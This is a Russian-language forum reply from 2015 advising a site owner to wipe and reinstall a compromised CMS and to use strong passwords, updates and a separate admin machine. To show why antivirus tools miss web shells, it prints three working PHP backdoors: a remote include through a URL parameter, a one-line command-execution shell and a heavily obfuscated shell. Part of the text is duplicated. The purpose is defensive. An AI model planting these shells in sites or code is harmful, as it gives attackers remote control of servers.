| |||||||||
| |||||||||
15.03.2015 15:20
боюсь вам требуется полная очистка и переустановка EWC с применением следующих правил:
ибо шелл может сидеть очень далеко и глубоко и не будет обнаружен антивирями
как к примеру вы обнаружите такой простой шелл:
или вот - самый маленький шелл:
или вот - чудеса обфускации:
вариантов очень много. мое мнение - чистить все. и заново.
и да - делайте нормальные пароли, делайте обновления движкам, не используйте ИЕ, админьте сайт с машины, через которую не ходите просто так по инету, или поставьте на ней отдельно Убунту какую-нибудь, в дополнении к Windows, чисто для админинья сайтов.
ибо шелл может сидеть очень далеко и глубоко и не будет обнаружен антивирями
как к примеру вы обнаружите такой простой шелл:
<? include $_GET['url']; ?>
или вот - самый маленький шелл:
<?=@`$c`?>
или вот - чудеса обфускации:
<?
@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$
$_[$__+ $__] ;$_[@-_]($_[@!+_] );
?>
вариантов очень много. мое мнение - чистить все. и заново.